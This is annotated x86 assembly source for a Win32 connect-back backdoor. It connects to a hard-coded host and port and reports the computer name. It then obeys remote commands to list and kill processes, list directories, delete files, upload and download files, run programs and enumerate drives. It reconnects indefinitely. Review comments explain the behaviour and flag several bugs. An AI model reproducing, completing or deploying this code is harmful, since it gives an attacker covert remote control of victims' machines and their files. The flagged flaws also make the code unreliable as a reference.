; mercury.asm -- 32-bit Win32 connect-back backdoor, TASM/MASM-style Intel
; syntax, flat model. Analyst summary of what this file visibly does:
; connect over TCP to `dns`:PORT, send the computer name, then execute
; 4-byte-tagged commands from the peer (process list/kill, dir, delete,
; file upload/download, ShellExecute, drive enumeration) until 'quit'.
; NOTE(review): `callw`, `dwo`, `wo`, `by` and `pushad_eax` are not defined
; in this file; presumably they come from useful.inc (a Win32 call macro and
; dword/word/byte ptr shorthands) -- confirm there before relying on them.
.586
.model flat
locals @@              ; @@-prefixed labels are local to the preceding non-local label
DEBUG equ 1            ; debug build: IAT hooks on send/recv dump all traffic to stdout (see entry)
; useful.inc provides the call/size macros used throughout
include useful.inc
PORT equ 6749          ; remote TCP port; converted to network byte order in entry
REPLY_SUCCESS equ 02h  ; one-byte acknowledgements sent by send_success / send_fail
REPLY_FAIL equ 01h
.data
fmt db "%s",7,"%08X",7,0   ; wire record: "<string>" BEL "<8 hex digits>" BEL (BEL = 07h delimiter)
dns db '127.0.0.1',0       ; hard-coded peer: tried as a dotted quad, else resolved via gethostbyname
ifdef DEBUG
ws32send dd 0              ; original IAT targets of send/recv, saved by the hooks installed in entry
ws32recv dd 0
send_title db 'send: ',0   ; hexdump headers
recv_title db 'recv: ',0
decimal_fmt db '%u',0
endif
.code
public c entry
entry:
; Program entry point. Flow: (DEBUG: hook send/recv) -> WSAStartup -> socket
; -> resolve `dns` -> connect, retrying forever -> run threadproc on the socket
; -> wait for it -> closesocket -> reconnect. There is no exit path here:
; the only `ret` (@@not_online) is unreachable because its jump is commented
; out; the process ends only via ExitProcess in threadproc ('quit').
; ebp is zeroed once and pushed as NULL/0 for the rest of the program.
; nop
; int 3
ifdef DEBUG
extern send:PROC
extern recv:PROC
; Debug build only: swap the IAT slots behind the send/recv import thunks
; with sendwrap/recvwrap and keep the originals in ws32send/ws32recv.
; Reads the disp32 at thunk+2, i.e. assumes each thunk is `jmp dword ptr
; [slot]` (FF 25) and that the import table is writable -- confirm against
; the linker output.
mov eax,offset sendwrap
mov ecx,offset recvwrap
mov ebx,offset send
mov ebx,[ebx+2]        ; ebx -> IAT slot of send
xchg eax,[ebx]         ; install hook, eax = original target
mov ebx,offset recv
mov ebx,[ebx+2]        ; ebx -> IAT slot of recv
xchg ecx,[ebx]
mov [ws32send],eax
mov [ws32recv],ecx
endif
sub ebp,ebp            ; ebp = 0 from here on
sub esp,190h           ; WSADATA (0x190 bytes) on the stack; never released
push esp
push 1                 ; wVersionRequested = 1.0
callw WSAStartup       ; result not checked
@@online:
push 6                 ; IPPROTO_TCP
push 1                 ; SOCK_STREAM
push 2                 ; AF_INET
callw socket
mov ebx,eax            ; ebx = socket; passed to threadproc as lpParameter
push offset dns
callw inet_addr
inc eax                ; INADDR_NONE (-1) -> not a dotted quad, resolve by name
jz @@hostname
dec eax
jmp short @@next
@@hostname:
push offset dns
callw gethostbyname
; NOTE(review): the NULL check below is commented out, so a failed lookup
; dereferences NULL at the next instruction.
; test eax,eax
; jz @@not_online
mov eax,dwo [eax+12]   ; hostent.h_addr_list
mov eax,dwo [eax]      ; h_addr_list[0]
mov eax,dwo [eax]      ; first IPv4 address, already in network order
@@next:
; Build a 16-byte sockaddr_in on the stack: sin_zero (8 bytes), sin_addr,
; then one dword holding sin_port (network order) in the high word and
; sin_family = AF_INET in the low word.
push ebp
push ebp
push eax
mov eax,PORT
xchg ah,al             ; htons(PORT)
shl eax,16
add eax,2              ; AF_INET
push eax
mov edi,esp            ; edi -> sockaddr_in
@@connection:
push 16
push edi
push ebx
callw connect
test eax,eax
jz @@thread
push 100               ; retry every 100 ms, no limit and no back-off
callw Sleep
jmp short @@connection
@@thread:
add esp,4*4            ; drop the sockaddr_in
push ebp               ; slot that receives the thread id
push esp               ; lpThreadId -> that slot
push ebp               ; dwCreationFlags = 0
push ebx               ; lpParameter = socket
push offset threadproc
push ebp               ; dwStackSize = 0
push ebp               ; lpThreadAttributes = NULL
callw CreateThread
pop ecx                ; discard the thread id slot
push -1                ; INFINITE
push eax
callw WaitForSingleObject   ; the thread handle is never closed (one leak per session)
push ebx
callw closesocket
jmp short @@online     ; new socket, reconnect, repeat
@@not_online:
ret                    ; unreachable; esp would also still be offset by the WSADATA
threadproc:
; Session thread. lpParameter (the connected socket) is read from the stack
; after pushad. Register roles for the command loop and every @@do_* handler:
;   ebx = socket, ebp = 0, edi = 256 (buffer size), esi = recv buffer
; (handlers see esi pointing just past the 4-byte tag).
; First sends the computer name, then loops: zero the buffer, recv up to 256
; bytes, compare the first dword against the little-endian multi-character
; constants below ('tsil' == bytes "list"), jump to the handler, which ends
; with `jmp @@recv_loop`. Each handler wraps itself in pushad/popad so the
; loop registers survive. recv returning 0 or -1 ends the thread.
; nop
; int 3
pushad
mov ebx,[esp+8*4+4]    ; lpParameter = socket (above the 8 pushad dwords + return address)
sub ebp,ebp            ; ebp = 0
mov edi,256
sub esp,edi            ; 256-byte buffer, used for the name and then as recv buffer
mov esi,esp
push edi               ; nSize (in/out) = 256
push esp               ; lpnSize -> that slot
push esi               ; lpBuffer
callw GetComputerNameA
pop ecx                ; drop the size slot
push ebp
push edi               ; NOTE(review): sends all 256 bytes rather than the returned
push esi               ; length, so uninitialised stack bytes after the name go on the wire.
push ebx
callw send
; push 100
; callw Sleep
@@recv_loop:
mov esi,esp
push edi
push esi
callw RtlZeroMemory    ; zero the buffer so a short command is NUL-terminated
push ebp               ; flags = 0
push edi               ; len = 256
push esi
push ebx
callw recv
test eax,eax
jz @@do_exit           ; 0 = peer closed
inc eax
jz @@do_exit           ; SOCKET_ERROR (-1)
dec eax
lodsd                  ; eax = 4-byte command tag, esi -> arguments (assumes DF clear)
cmp eax,'tsil' ;list
je @@do_list
cmp eax,' led' ;del + SPACE
je @@do_del
cmp eax,' rid' ;dir + SPACE
je @@do_dir
cmp eax,'vird' ;driv
je @@do_drive
cmp eax,'dlpu' ;upld
je @@do_upld
cmp eax,'nwod' ;down
je @@do_down
cmp eax,'llik' ;kill
je @@do_kill
cmp eax,' nur' ;run + SPACE
je @@do_run
cmp eax,'tiuq' ;quit
jnz @@recv_loop        ; unknown tag: silently ignored, no reply
push eax               ; exit code = 'tiuq'
callw ExitProcess      ; ends the whole process, not just this session
@@do_exit:
add esp,256
popad
retn                   ; thread exit; entry then closes the socket and reconnects
@@do_list:
; 'list': send every process as "<exe name>" BEL "<pid as 8 hex>" BEL
; records, concatenated into one 4096-byte buffer that is sent whole.
pushad
push ebp               ; th32ProcessID = 0
push 2                 ; TH32CS_SNAPPROCESS
callw CreateToolhelp32Snapshot
mov edi,eax            ; edi = snapshot handle (INVALID_HANDLE_VALUE not checked)
push 4096
pop ecx
sub esp,ecx
mov ebp,esp            ; ebp -> 4096-byte output buffer (this ebp copy is restored by popad)
push ecx
push ebp
callw RtlZeroMemory
; push 128h
; pop ecx
mov ecx,128h           ; sizeof(PROCESSENTRY32) = 128h
sub esp,ecx            ; the structure sits directly below the output buffer
mov [esp],ecx          ; pe.dwSize
push esp
push edi
callw Process32First   ; return value not checked
@@step_list:
lea esi,[esp+36]       ; pe.szExeFile
push dwo [esp+8]       ; pe.th32ProcessID
push esi               ; "%s" argument
lodsb                  ; advance esi just past the NUL of szExeFile
test al,al
jnz $-3
push offset fmt
push esi               ; destination: inside the PROCESSENTRY32, right after the name
callw wsprintfA
; NOTE(review): the record (name + 11 bytes) is formatted into the 128h-byte
; structure after the name, so an exe name longer than about 124 characters
; runs past the structure into the output buffer above it. lstrcat below
; appends with no remaining-length check, so enough (or long enough)
; process names also overflow the 4096-byte buffer.
add esp,4*4
push esi
push ebp
callw lstrcat
push esp
push edi
callw Process32Next
test eax,eax
jnz @@step_list
push edi
callw CloseHandle
push 0
push 4096              ; always the full 4096 bytes, zero padded
push ebp
push ebx
callw send
add esp,(128h+4096)
popad
jmp @@recv_loop
@@do_kill:
; 'kill <8 hex digits>': TerminateProcess the given pid. Always replies
; success; OpenProcess/TerminateProcess results are not checked and the
; process handle is never closed. str2hex leaves the direction flag set
; (see that routine), which affects every later string instruction.
pushad
inc esi                ; skip the space after 'kill'
call str2hex           ; eax = pid from 8 hex digits at esi
push eax               ; dwProcessId
push ebp               ; bInheritHandle = FALSE
push 1                 ; PROCESS_TERMINATE
callw OpenProcess
push ebp               ; uExitCode = 0
push eax               ; hProcess (may be NULL on failure)
callw TerminateProcess
call send_success
popad
jmp @@recv_loop
@@do_upld:
; 'upld <path> <decimal size>': create/overwrite <path> and write the next
; <size> bytes received on the socket into it. The peer controls the path.
pushad
call send_success      ; acknowledged before the file is even opened
inc esi                ; skip the space; esi -> path
push esi               ; keep the path pointer
lodsb                  ; scan to the space after the path (no length bound:
sub al,' '             ; a NUL does not stop the scan, only a space does)
jnz $-3
mov [esi-1],al         ; al is 0 here: NUL-terminate the path in place
call str2long          ; ecx = decimal byte count, esi advanced past it
mov esi,ecx            ; esi = bytes still expected
pop eax                ; eax -> path
push ebp               ; hTemplateFile = NULL
push 80h               ; FILE_ATTRIBUTE_NORMAL
push 2                 ; CREATE_ALWAYS
push ebp               ; lpSecurityAttributes = NULL
push ebp               ; dwShareMode = 0
push 40000000h         ; GENERIC_WRITE
push eax               ; lpFileName
callw CreateFileA
mov edi,eax            ; edi = file handle; INVALID_HANDLE_VALUE is not checked
sub esp,2048
mov ebp,esp            ; ebp -> 2048-byte receive chunk (restored by popad)
@@file_loop:
push 2048
push ebp
callw RtlZeroMemory
push 0
push 2048
push ebp
push ebx
callw recv
test eax,eax
jz @@exit              ; peer closed
; NOTE(review): unlike @@do_down there is no `js` check, so SOCKET_ERROR (-1)
; falls through to WriteFile with a length of 0FFFFFFFFh.
push eax               ; save the byte count across WriteFile
push 0                 ; lpOverlapped
lea ecx,[esp-4]        ; lpNumberOfBytesWritten -> the argument slot pushed next
push ecx
push eax               ; nNumberOfBytesToWrite
push ebp               ; lpBuffer
push edi               ; hFile
callw WriteFile        ; result not checked
pop eax                ; byte count
sub esi,eax            ; remaining -= received
test esi,esi
jnz @@file_loop        ; NOTE(review): a chunk larger than the remainder wraps esi, so the
                       ; loop then ends only when the peer closes the connection
@@exit:
push edi
callw CloseHandle
add esp,2048
popad
jmp @@recv_loop
;@@do_down:
; pushad
; inc esi
;
; push ebp
; push ebp
; push 3
; push ebp
; push ebp
; push 80000000h
; push esi
; callw CreateFileA
; inc eax
; jz @@error
; dec eax
; mov edi,eax
;
; push ebp
; push edi
; callw GetFileSize
;; mov esi,eax
;
; push ebp
; push eax
; mov eax,esp
;
; push ebp
; push 5
; push eax
; push ebx
; callw send
; pop esi
;
; mov eax,esp
; push ebp
; push 5
; push eax
; push ebx
; callw recv
; pop ecx
; test eax,eax
; js @@error
; jz @@error
;
; sub esp,2048
; mov ebp,esp
;
;@@down_loop:
; push 2048
; push ebp
; callw RtlZeroMemory
;
; push eax
; push 0
; lea eax,[esp+4]
; push eax
; push 2048
; push ebp
; push edi
; callw ReadFile
; pop ecx
;
; push 0
; push ecx
; push ebp
; push ebx
; callw send
;
; sub esi,eax
; test esi,esi
; jnz @@down_loop
;
; push edi
; callw CloseHandle
;
; add esp,2048
; popad
; jmp @@recv_loop
;
;@@error:
; call send_fail
; popad
; jmp @@recv_loop
@@do_down:
; 'down<path>': send the file size as 8 hex digits (in a 60-byte record),
; wait for a 5-byte acknowledgement, then stream the file in 2048-byte
; chunks. Replaces the commented-out version above.
pushad
inc esi                ; esi -> path (byte after the tag)
push ebp               ; hTemplateFile = NULL
push ebp               ; dwFlagsAndAttributes = 0
push 3                 ; OPEN_EXISTING
push ebp               ; lpSecurityAttributes = NULL
push ebp               ; dwShareMode = 0
push 80000000h         ; GENERIC_READ
push esi               ; lpFileName
callw CreateFileA
inc eax
jz @@error             ; INVALID_HANDLE_VALUE
dec eax
mov edi,eax            ; edi = file handle
push ebp
push edi
callw GetFileSize      ; failure (-1) is not checked; only the low dword is used
mov esi,eax            ; esi = bytes remaining to send
sub esp,64             ; 64-byte buffer for the size record
mov eax,esp
push eax               ; keep the buffer pointer
push 64
push eax
callw RtlZeroMemory
pop eax
push eax               ; dest
push esi               ; value
call dword2hexstr      ; pops both arguments; registers preserved, eax still -> buffer
push ebp
push 60
push eax
push ebx
callw send             ; 8 hex digits followed by 52 NULs
add esp,60
; NOTE(review): the buffer is 64 bytes but only 60 are released, so the
; 5-byte recv below writes bytes 60..64 of it. The 65th byte is the low byte
; of the edi value saved by pushad; popad then hands threadproc edi = 100h
; with its low byte replaced by the peer's 5th byte, which becomes the recv
; length for the 256-byte command buffer. The `pop ecx` afterwards is what
; rebalances the stack.
mov eax,esp
push ebp
push 5
push eax
push ebx
callw recv
pop ecx
test eax,eax
js @@error             ; SOCKET_ERROR: the file handle in edi is leaked on this path
jz @@error             ; peer closed: same leak
sub esp,2048
mov ebp,esp            ; ebp -> read buffer
@@down_loop:
push 2048
push ebp
callw RtlZeroMemory
push eax               ; slot for lpNumberOfBytesRead
push 0                 ; lpOverlapped
lea eax,[esp+4]
push eax               ; lpNumberOfBytesRead -> that slot
push 2048
push ebp
push edi
callw ReadFile         ; return value not checked
pop ecx                ; ecx = bytes read
push 0
push ecx
push ebp
push ebx
callw send
sub esi,eax            ; NOTE(review): subtracts bytes SENT, not bytes read; a short
test esi,esi           ; send, a SOCKET_ERROR (-1) or a 0-byte read at EOF keeps
jnz @@down_loop        ; this loop running.
push edi
callw CloseHandle
add esp,2048
popad
jmp @@recv_loop
@@error:
call send_fail
popad
jmp @@recv_loop
@@do_run:
; 'run <file>': ShellExecuteA(NULL, "open", <file>, NULL, NULL, SW_SHOWNORMAL).
; Remote execution of whatever the peer sends; the result is ignored and
; success is always reported.
pushad
push 1                 ; nShowCmd = SW_SHOWNORMAL
push ebp               ; lpDirectory = NULL
push ebp               ; lpParameters = NULL
push esi               ; lpFile = bytes after 'run '
call @@s_open          ; pushes the address of the "open" string below as lpOperation
db 'open',0
@@s_open:
push ebp               ; hwnd = NULL
callw ShellExecuteA
call send_success
popad
jmp @@recv_loop
@@do_dir:
; 'dir <path>': enumerate <path>\*.* and send one "<name>" BEL "<size hex>"
; BEL record per entry (size = FFFFFFFF for directories), then a success
; byte. If FindFirstFileA fails nothing at all is sent back.
pushad
sub esp,1024
mov ebp,esp            ; ebp -> 1024-byte wsprintf output (restored by popad)
sub esp,140h           ; sizeof(WIN32_FIND_DATAA) = 140h
mov edi,esp            ; edi -> WIN32_FIND_DATAA
push edi               ; lpFindFileData
push esi               ; lpFileName = the path in the recv buffer, extended in place below
lodsb                  ; find the NUL ending the path (no bound: relies on the zeroed buffer)
test al,al
jnz $-3
mov dwo [esi-1],'*.*\' ;\*.*  overwrite the NUL with "\*.*" ...
mov dwo [esi+3],0      ; ... and re-terminate (8 bytes written past the original end)
callw FindFirstFileA
inc eax
jz @@exit_dir          ; INVALID_HANDLE_VALUE: no reply in this case
dec eax
@@find_next:
push eax               ; keep the find handle across the calls
mov ecx,[edi]          ; dwFileAttributes
bt ecx,4 ;FILE_ATTRIBUTE_DIRECTORY
jnc @@file
sub ecx,ecx
dec ecx ;-1            ; directories are reported with size FFFFFFFF
jmp short @@build
@@file:
mov ecx,[edi+20h]      ; nFileSizeLow (high dword ignored)
@@build:
lea eax,[edi+2ch]      ; cFileName
push ecx
push eax
push offset fmt
push ebp
callw wsprintfA
add esp,4*4
push 0
push eax               ; record length returned by wsprintfA
push ebp
push ebx
callw send             ; one send per entry; framing relies on the BEL delimiters
pop eax                ; find handle
push eax
push edi
push eax
callw FindNextFileA
test eax,eax
pop eax
jnz @@find_next
push eax
callw FindClose
call send_success
@@exit_dir:
add esp,(140h+1024)
popad
jmp @@recv_loop
@@do_del:
; 'del <path>': DeleteFileA on the peer-supplied path. The return value is
; ignored and success is always reported.
pushad
push esi               ; lpFileName = bytes after 'del '
callw DeleteFileA
call send_success
popad
jmp @@recv_loop
@@do_drive:
; 'driv': report each present drive as "X:\" BEL "FFFFFFFF" BEL, one send
; per drive, then a success byte.
pushad
sub esp,256
mov esi,esp            ; esi -> 256-byte wsprintf output
sub edi,edi            ; edi = drive number (1 = A:)
callw GetLogicalDrives ; eax = bitmask, bit 0 = A:
@@rotate:
inc edi
shr eax,1              ; CF = this drive is present
jnc @@rotate           ; NOTE(review): if eax is already 0 (call failed) this never exits
test eax,eax
jz @@done              ; NOTE(review): tested after the bit was consumed, so the
                       ; highest present drive letter is never reported
pushad
mov ecx,005c3a40h ;'@:\',0   '@' + drive number = the letter
add ecx,edi
push ecx               ; the 4-byte string lives on the stack
mov ecx,esp
dec ebp                ; ebp = -1 for "%08X" (this copy is discarded by the inner popad)
push ebp
push ecx
push offset fmt
push esi
callw wsprintfA
add esp,4*4+4          ; 4 arguments + the string
push 0
push eax               ; record length
push esi
push ebx
callw send
popad
jmp @@rotate
@@done:
call send_success
add esp,256
popad
jmp @@recv_loop
str2hex:
; Parse exactly 8 hex digits at [esi] (most significant first, either case)
; into the caller's eax, written through the pushad save slot. On a non-hex
; byte it returns early with eax unchanged. Reads backwards from esi+7 so
; each nibble can be rotated into place.
; NOTE(review): sets the direction flag (std) and nothing in this file ever
; clears it. Every later lodsb/lodsd/stosb in the program -- including the
; `lodsd` that reads the next command tag -- then runs backwards. A `cld`
; before `popad` would restore the state the Win32 ABI expects.
pushad
sub edx,edx            ; accumulator
push 8
pop ecx                ; exactly 8 digits; shorter input reads past the text
add esi,7              ; start at the least significant digit
std
@@round1:
lodsb
sub al,30h             ; '0'..'9' -> 0..9
cmp al,09h
jbe @@round2
and al,11011111b       ; fold lower case onto upper case
sub al,07h             ; 'A'..'F' -> 10..15
cmp al,0fh
ja @@end               ; not a hex digit; note ':'..'@' still pass as 3..9
@@round2:
add dl,al
ror edx,4              ; after 8 rotations each nibble is in its final position
loop @@round1
mov [esp+pushad_eax],edx   ; result into the saved eax, delivered by popad
@@end:
popad
ret
dword2hexstr:
; dword2hexstr(value, dest): store value as 8 upper-case hex digits at dest,
; no terminator. Pops both arguments (`ret 2*4`); all registers preserved
; via pushad/popad. stosb assumes the direction flag is clear.
; NOTE(review): `mov cl,8` sets only the low byte of ecx while `loop` counts
; the full 32-bit ecx. If the caller's upper 24 bits of ecx are non-zero
; (in @@do_down they are whatever RtlZeroMemory left behind) the loop keeps
; storing far past dest. `mov ecx,8` would bound it.
pushad
mov eax,[esp+8*4+4]    ; value
mov edi,[esp+8*4+8]    ; dest
mov cl,8
@@rnd1:
rol eax,4              ; next most significant nibble into al
push eax
and al,00001111b
add al,30h             ; '0'..'9'
cmp al,39h
jbe @@rnd2
add al,07h             ; 'A'..'F'
@@rnd2:
stosb
pop eax
loop @@rnd1
popad
ret 2*4
str2long:
; Parse an unsigned decimal number at [esi] into ecx. Stops at the first
; non-digit (NUL, space, ...) and leaves esi one past it. Clobbers eax
; (upper bytes stay 0, al = last byte read minus '0'). No overflow check:
; more than ten digits wrap silently.
sub eax,eax
sub ecx,ecx
@@nextdigit:
lodsb
sub al,'0'
jb @@done              ; byte below '0' (incl. NUL and space)
cmp al,9
ja @@done              ; byte above '9'
imul ecx,10
add ecx,eax            ; eax == digit value since only al was written
jmp short @@nextdigit
@@done:
ret
send_success:
; Send the single byte REPLY_SUCCESS on socket ebx; the send result is
; ignored. `call @@reply_byte` pushes the address of the `db` below, which
; serves as send()'s buffer argument.
pushad
push 0                 ; flags
push 1                 ; len
call @@reply_byte      ; pushes &REPLY_SUCCESS as lpBuf
db REPLY_SUCCESS,0
@@reply_byte:
push ebx               ; socket
callw send
popad
ret
send_fail:
; Send the single byte REPLY_FAIL on socket ebx; same trick as send_success,
; result ignored.
pushad
push 0                 ; flags
push 1                 ; len
call @@reply_byte      ; pushes &REPLY_FAIL as lpBuf
db REPLY_FAIL,0
@@reply_byte:
push ebx               ; socket
callw send
popad
ret
ifdef DEBUG
;thanks to comrade64:
sendwrap:
; Debug hook installed into send's IAT slot by entry. Dumps the outgoing
; buffer, then tail-jumps to the real send with the caller's frame intact.
; Stack on entry: [esp+4]=s, [esp+8]=buf, [esp+0ch]=len, [esp+10h]=flags.
; int 3
push dwo [esp+0ch]     ; len
push dwo [esp+0ch]     ; buf (offset shifted by the push above)
push offset send_title
call hexdump           ; hexdump(title, buf, len) pops its own 3 arguments
jmp [ws32send]
recvwrap:
; Debug hook for recv: forwards all four arguments to the real recv, dumps
; what arrived (length = return value; for SOCKET_ERROR hexdump prints only
; the header) and returns that value, popping the caller's 16 bytes of
; arguments like the stdcall original.
; int 3
push dwo [esp+10h]     ; flags
push dwo [esp+10h]     ; len
push dwo [esp+10h]     ; buf
push dwo [esp+10h]     ; s
call ws32recv          ; indirect through the saved IAT value
push eax               ; keep the return value
push eax               ; dwLength = bytes received
push dwo [esp+10h]     ; buf
push offset recv_title
call hexdump
pop eax
retn 10h
hexdump proc pszTitle:dword, lpData:dword, dwLength:dword
; Debug only. Write "<title><n> bytes" and a hex dump of lpData to stdout via
; strout/charout: rows of 16 bytes as "XX " groups, padded to the ASCII
; column, then the ASCII view (bytes below 20h shown as '.'; bytes 7fh and
; above are passed to putchar unchanged). Continuation rows are indented by
; lstrlen(pszTitle). stdcall: `ret 3*4`. A dwLength <= 0 (signed compare)
; prints only the header line. Uses lodsb/stosb, so it assumes DF is clear.
LOCAL chars[64]:byte
enter 64,0
lea eax,chars
push 64
push eax
callw RtlZeroMemory
push ebx               ; preserve the caller's ebx/esi/edi
push esi
push edi
push [pszTitle]
callw lstrlen
push eax
push [pszTitle]
call strout            ; strout(title, lstrlen(title))
lea edi,[chars]
push [dwLength]
push offset decimal_fmt
push edi
callw wsprintfA        ; chars = "%u" of the length
add esp,3*4
add edi,eax
mov eax,'tyb '         ; append " bytes"
stosd
mov eax,'se'
stosw
lea eax,[chars]
sub edi,eax            ; edi = length of "<n> bytes"
push edi
push eax
call strout
call @@nl              ; CR LF + indent
mov esi,[lpData]
mov ecx,[dwLength]
xor ebx,ebx            ; ebx = bytes emitted on the current row
test ecx,ecx
jle @@quit             ; nothing, or a negative length, to dump
@@next:
push ecx
lea edi,[chars]
lodsb
mov ah,al
shr al,4               ; al = high nibble, ah = low nibble
and ah,0Fh
cmp al,10              ; nibble -> ASCII hex: CF set for 0..9, then
sbb al,69h             ; DAS adjusts to '0'..'9' / 'A'..'F'
das
stosb
mov al,ah
cmp al,10
sbb al,69h
das
stosb
mov al," "
stosb
sub edi,3
push 3
push edi
call strout            ; "XX "
inc ebx
cmp ebx,10h
jl @@skip
call @@ascii           ; full row: ASCII column
call @@nl              ; newline + indent, leaves ebx = 0
@@skip:
pop ecx
loop @@next
call @@ascii           ; ASCII column for the final, possibly partial, row
push offset @@quit     ; make @@nl's `retn` land on @@quit ...
and [pszTitle],0       ; ... with a NULL title, so lstrlen is 0 and no indent is printed
@@nl:
; Local subroutine: print CR LF, then lstrlen(pszTitle) spaces. Leaves ebx = 0.
lea edi,[chars]
mov wo [edi],0A0Dh
push 2
push edi
call strout
push [pszTitle]
callw lstrlen
test eax,eax
mov ebx,eax
jz @@nopad
mov by [edi]," "
@@back_1:
push 1
push edi
call strout
dec ebx
jg @@back_1
@@nopad:
retn
@@ascii:
; Local subroutine: pad a row to the ASCII column (3 spaces for each missing
; byte plus one separator), then print the ebx bytes of this row -- which
; esi has already passed -- as ASCII. Expects ebx in 1..16; leaves ebx = 0.
mov ecx,10h
sub ecx,ebx
inc ecx
test ecx,ecx
jle @@anopad
lea ecx,[ecx+ecx*2]    ; (16 - ebx + 1) * 3 spaces
lea edi,[chars]
mov by [edi]," "
@@back_2:
push ecx
push 1
push edi
call strout
pop ecx
dec ecx
jg @@back_2
@@anopad:
sub esi,ebx            ; back to the first byte of the row
@@achar:
lodsb
cmp al,20h
jae @@forward_1
mov al,"."             ; control characters shown as '.'
@@forward_1:
mov [edi],al
push 1
push edi
call strout
dec ebx
jg @@achar
retn
@@quit:
pop edi
pop esi
pop ebx
leave
ret 3*4
hexdump endp
strout:
; strout(lpText, cchCount): write cchCount bytes via charout. Pops its two
; arguments (`ret 2*4`); all registers preserved. The loop is do-while, so a
; count of 0 prints one byte and then wraps ecx -- callers must never pass 0
; (in this file the counts are constants, non-empty titles, or guarded by a
; jz in hexdump's @@nl). lodsb assumes DF is clear.
pushad
mov esi,[esp+8*4+4]    ; lpText
mov ecx,[esp+8*4+8]    ; count
@@print_char:
lodsb
push eax
call charout           ; pops its argument
dec ecx
test ecx,ecx
jnz @@print_char
popad
ret 2*4
charout:
; charout(ch): putchar(ch) through the C runtime (cdecl: the `add esp,4`
; is the caller-side cleanup). Only the low byte of the argument matters;
; the upper bytes of eax are whatever the caller had. Pops its argument
; (`ret 4`); all registers preserved.
pushad
mov al,[esp+8*4+4]     ; the byte to print
push eax
callw putchar
add esp,4              ; cdecl cleanup
popad
ret 4
endif
end